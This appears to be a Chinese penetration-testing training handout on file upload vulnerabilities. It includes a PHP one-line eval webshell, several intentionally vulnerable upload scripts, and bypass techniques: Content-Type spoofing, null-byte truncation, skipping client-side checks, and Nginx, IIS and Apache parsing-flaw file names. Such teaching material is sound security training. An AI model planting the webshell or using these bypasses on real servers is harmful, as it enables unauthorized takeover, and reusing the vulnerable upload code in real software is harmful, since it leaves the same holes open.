# 米斯特白帽培训讲义 漏洞篇 文件上传

> 讲师：[gh0stkey](https://www.zhihu.com/people/gh0stkey/answers)

> 整理：[飞龙](https://github.com/)

> 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0)

我们首先看一下文件上传的流程图。

![](http://ww4.sinaimg.cn/large/841aea59jw1faydcmhhyaj20c809mwek.jpg)

其中，浏览器通过上传页面将文件储存到服务器中。一般这些上传页面都会有限制（比如限制格式为`jpg/gif/png`等等，或者限制文件大小）。

我们所关注的这个上传页面，一旦限制了文件就可能导致我们的渗透测试失败。那么真的完全失败了吗？后面会讲到很多方法，代码本身我们突破不了，但是我们可以用这些方法来绕过限制。

漏洞页面大致分为两种，一种是不限制任何格式，随意上传，这种现在比较少了。另一种是限制`Content-type`，虽然它限制了文件类型，但我们就可以突破它。

## 一句话

我们利用文件上传漏洞的目的是拿到 WebShell，也就是取得一定的服务器权限。一句话是指`<?php @eval($_POST['a']) ?>`，其中`$_POST`数组中的名称通常叫做密码，可以随意更改。如果服务器存在含有这个代码的脚本，我们就可以访问它，并传入我们想要的代码来执行。

一句话有很多优点，首先，比起完整的木马，它的特征比较少，不容易被防火墙发现。其次，就算被发现，也可以轻易利用 PHP 的动态特性，对其进行混淆和变形。

通常我们使用菜刀这个工具来连接和管理 WebShell，详细的使用方法见下面的实战部分。

## 任意文件上传

看一下这段代码：

```php
<form action="" method="POST" ENCTYPE="multipart/form-data">
    点这里上传文件:
    <input type="file" name="userfile">
    <input type="submit" value="提交">
</form>
<?php
if(!isset($_FILES['userfile']))
    exit;
echo "<pre>";
print_r($_FILES);
echo "</pre>";
$uploaddir='upfile/';
$PreviousFile=$uploaddir.basename(@$_FILES['userfile']['name']);
if(move_uploaded_file(@$_FILES['userfile']['tmp_name'], $PreviousFile))
    echo '上传成功！';
else
    echo '上传失败！';
```

首先是一个文件上传表单，我们可以看到表单中多了一个`enctype`属性，是因为文件上传的格式和之前不一样，不加这个就无法识别了。

然后会检查是否接受到了上传文件，没有接收到就直接结束。之后会打印出文件信息，便于我们调试。之后将上传文件的名称和保存上传文件的目录拼接，将文件从临时目录移动到这个目录。最后输出成功或失败信息。

将其保存为`upfile.php`后，我们首先访问它并尝试上传一个文件。我们把一句话`<?php @eval($_POST['a']) ?>`写入`1.php`，然后把它上传到服务器。

![](http://ww2.sinaimg.cn/large/841aea59jw1faydcsou88j20i805jwen.jpg)

于是我们看到上传成功。

![](http://ww1.sinaimg.cn/large/841aea59jw1faydd7i90hj20hm0bz0t9.jpg)

我们可以看到打印出的文件信息，其中：

+   `userfile`是这个文件在数组中的索引，也是表单中的文件上传输入框的名称。
+   `name`是这个文件的文件名。
+   `type`是这个文件的类型。
+   `tmp_name`是这个文件的临时完整路径。
+   `error`是错误代码。
+   `size`是文件大小。

之后，尝试直接访问所上传的文件，发现访问成功。

![](http://ww2.sinaimg.cn/large/841aea59jw1faydde1z61j20ht065q30.jpg)

然后我们就可以拿菜刀连接了。

![](http://ww1.sinaimg.cn/large/841aea59jw1fayddj2gysj20se0fj3zk.jpg)

我们可以看到连接成功，那么我们就成功地 GetShell 了。

## 文件类型限制

如果`upfile.php`的内容变成这样：

```php
<form action="" method="POST" enctype="multipart/form-data">
    点这里上传文件:
    <input type="file" name="userfile">
    <input type="submit" value="提交">
</form>
<?php
if(!isset($_FILES['userfile']))
    exit;
echo "<pre>";
print_r($_FILES);
echo "</pre>";
if(@$_FILES['userfile']['type'] != "image/gif"){
        echo "对不起，我们只允许上传GIF格式的图片!!";
        exit;
}
$uploaddir='upfile/';
$PreviousFile=$uploaddir.basename(@$_FILES['userfile']['name']);
if(move_uploaded_file(@$_FILES['userfile']['tmp_name'], $PreviousFile))
    echo "上传成功！";
else
    echo "上传失败！";
```

这段代码多出来的东西就是，它首先验证了文件类型，如果是`gif`则放过，不是则拦截。那么根据`multipart`编码类型，`type`这个东西在浏览器生成之后，是可以改的。我们可以通过 Burp 拦截并修改这个值。

首先我们打开 Burp，配置代理，访问`upfile.php`。之后开启拦截模式并上传一个文件：


我们拦截之后，找到`Content-Type`，发现他是`application/oct-stream`，我们把它改成`image/gif`，之后放行（可能需要多次，在我这里是这样）。

![](http://ww1.sinaimg.cn/large/841aea59jw1fayddqscl3j20ok0j8tan.jpg)

![](http://ww2.sinaimg.cn/large/841aea59jw1fayde2a2rej20ok0j8q4v.jpg)

然后我们可以看到上传成功，上传目录中出现了我们上传的文件。

![](http://ww4.sinaimg.cn/large/841aea59jw1fayde6e6gtj20vs0o6wfh.jpg)

![](http://ww1.sinaimg.cn/large/841aea59jw1faydee1rguj20r20fv74y.jpg)

## 文件扩展名限制（补充）

现在，我们把`upfile.php`改成这样：

```php
<form action="" method="POST" enctype="multipart/form-data">
    点这里上传文件:
    <input type="file" name="userfile">
    <input type="submit" value="提交">
</form>
<?php
function extname($s) {
    $p = strrpos($s, '.');
    if($p === false)
        return '';
    else
        return substr($s, $p + 1);
}

if(!isset($_FILES['userfile']))
    exit;
echo "<pre>";
print_r($_FILES);
echo "</pre>";
if(extname(@$_FILES['userfile']['name']) != 'gif'){
        echo "对不起，我们只允许上传GIF格式的图片!!";
        exit;
}
$uploaddir='upfile/';
$PreviousFile=$uploaddir.basename(@$_FILES['userfile']['name']);
if(move_uploaded_file(@$_FILES['userfile']['tmp_name'], $PreviousFile))
    echo "上传成功！";
else
    echo "上传失败！";
```

我们看到之前的文件类型校验变成了后缀名校验。那么如何绕过呢？其实，很多服务器都可以使用 00 截断来绕过。原理是这样，操作系统不允许文件中存在空字符（`'\0'`），所以保存文件时会发生截断，只保留空字符前面的东西作为文件名。但是后端程序中是可以处理空字符的。例如，我们如果把文件名改成`1.php\0.jpg`，那么在程序中，它的扩展名为`jpg`，但是保存之后，文件名为`1.php`，从而达到绕过的目的。

Burp 的实际操作实际上非常简单。我们点击`Intercept is on`，关闭拦截模式，然后提交文件后，点击`Proxy`选项卡，可以找到之前的请求：

![](http://upload-images.jianshu.io/upload_images/118142-72dba03172fedd96.jpg)

然后我们右键点击该请求，然后点击`Send to Repeater`：

![](http://upload-images.jianshu.io/upload_images/118142-023e9eaab2b941c0.jpg)

可以在 Repeater 中找到我们的请求。

![](http://upload-images.jianshu.io/upload_images/118142-a799bf907eb62edf.jpg)

我们在上图的`1.php`后面添加`.gif`，然后点击上面的`hex`选项卡。找到刚刚添加的`.gif`。

![](http://upload-images.jianshu.io/upload_images/118142-d192fba964113340.jpg)

鼠标拖动出来的区域就是`.gif`，最前面那个`.`的十六进制是`2e`，我们在它上面点击右键。

![](http://upload-images.jianshu.io/upload_images/118142-1519e5e4dab11fcd.jpg)

我们点击`insert byte`，之后`2e`的格子之前就会出现一个`00`的格子。

![](http://upload-images.jianshu.io/upload_images/118142-0676652b58377998.jpg)

这样就满足了我们的要求，我们可以点击上面的`go`来发送请求。这个技巧并不对所有服务器都管用，但是值得一试。

## 前端 JS 验证绕过

如果`upfile.php`变成了这样：

```php
<form action="" method="POST" enctype="multipart/form-data" name="fileform">
    点这里上传文件:
    <input type="file" name="userfile">
    <input type="submit" value="提交">
</form>
<script>
function checkFile(e) {
    var file = document.forms.fileform.userfile.value;
    if(!file.endsWith('.gif')) {
        alert('对不起，我们只允许上传GIF格式的图片!!');
        e.preventDefault();
    }
}
document.addEventListener('DOMContentLoaded', function() {
    document.forms.fileform.onsubmit = checkFile;
});
</script>
<?php
function extname($s) {
    $p = strrpos($s, '.');
    if($p === false)
        return '';
    else
        return substr($s, $p + 1);
}

if(!isset($_FILES['userfile']))
    exit;
echo "<pre>";
print_r($_FILES);
echo "</pre>";
$uploaddir='upfile/';
$PreviousFile=$uploaddir.basename(@$_FILES['userfile']['name']);
if(move_uploaded_file(@$_FILES['userfile']['tmp_name'], $PreviousFile))
    echo "上传成功！";
else
    echo "上传失败！";
```

我们可以看到，验证的代码移到了前端，之前我们说过，前端的一切东西都是不安全的，可以绕过。我们只需要首先上传一张正常图片，拿 Burp 抓到请求包，之后就跟“任意文件上传”的原理一样了，想怎么改就怎么改。

这里面要注意，如果你在前端看到了文件校验，那么程序员很可能由于偷懒而没有在后端添加校验。这是一个非常显眼的漏洞标志。

## Nginx 解析漏洞

如果服务器是 Nginx，我们可以直接上传图片格式，利用解析漏洞拿 Webshell。漏洞成因是，由于 Nginx 部分版本程序自身的漏洞，导致可以解析并执行非脚本文件。

假设存在漏洞的站点上有一张图片，URL 地址为：

```
www.xxx.com/logo.jpg
```

我们正常访问时，Nginx 会把它当做非脚本，直接读取并传给客户端。但是如果我们这样访问：

```
www.xxx.com/logo.jpg/a.php
```

他就会把`logo.jpg`当做 PHP 文件来执行。或者是

```
www.xxx.com/logo.jpg%00.php
```

也会导致图片执行，这个是 7 月中旬爆出的解析漏洞。

要利用这个漏洞，我们可以随便找一张图片，在里面插入一句话：

![](http://ww1.sinaimg.cn/large/841aea59jw1fayf99bpp3j21e00u9ah4.jpg)

我们将其上传之后，访问图片的 URL，确认上传成功。

![](http://ww2.sinaimg.cn/large/841aea59jw1fayf9fpguwj20lg093t8w.jpg)

然后我们利用该解析漏洞构造 URL，发现也能够成功访问，也能拿菜刀来连接。

![](http://ww2.sinaimg.cn/large/841aea59jw1fayf9kn7juj21ds08edhg.jpg)

![](http://ww2.sinaimg.cn/large/841aea59jw1fayf9ncmg7j20zj0jd0ty.jpg)

## IIS 解析漏洞

IIS 5.x/6.0 主要存在两个解析漏洞，第一个是目录解析：

```
/a.asp/b.jpg
```

其中`a.asp`是目录，`b.jpg`是真实存在的文件，那么`b.jpg`会当做`asp`文件来执行。这个漏洞需要我们能够创建目录。

第二个是文件解析，也就是分号截断：

```
a.asp;.jpg
```

这个文件的扩展名在上传时是`jpg`，但是上传之后，IIS 会把它当做`asp`文件来解析。

另外，在IIS 中，可执行脚本的扩展名除了`asp`之外，还有`asa`、`cdx`、`cer`。许多网站往往就过滤不全，一定要重视！！

## Apache 解析漏洞

Apache 的解析漏洞比较有意思，它从右到左解析扩展名，如果碰到不认识的扩展名，则继续往下解析。比如我们上传`a.php.owf.rar`，它按照`rar owf php`的顺序解析扩展名，但是他不认识后面两个，所以只能将其解析为`php`，但在程序中，文件的扩展名一直是`rar`。

这里的关键在于，如果 Apache 不认识某个扩展名，但是程序中没有过滤（比如`rar`），我们就可以将`1.php`改成`1.php.rar`，上传之后直接访问它。因此，我们需要对照程序中允许的扩展名，以及 Apache 不认识的扩展名，一个一个尝试。新的扩展名会越来越多，程序由于自身需要会对其放行，但是只要 Apache 不改变其解析规则，这个漏洞就会继续生效。

## 参考

+   [文件解析漏洞总结](http://blog.csdn.net/wizardforcel/article/details/50695896)

+   [新手指南：DVWA-1.9全级别教程之File Upload](http://www.freebuf.com/articles/web/119467.html)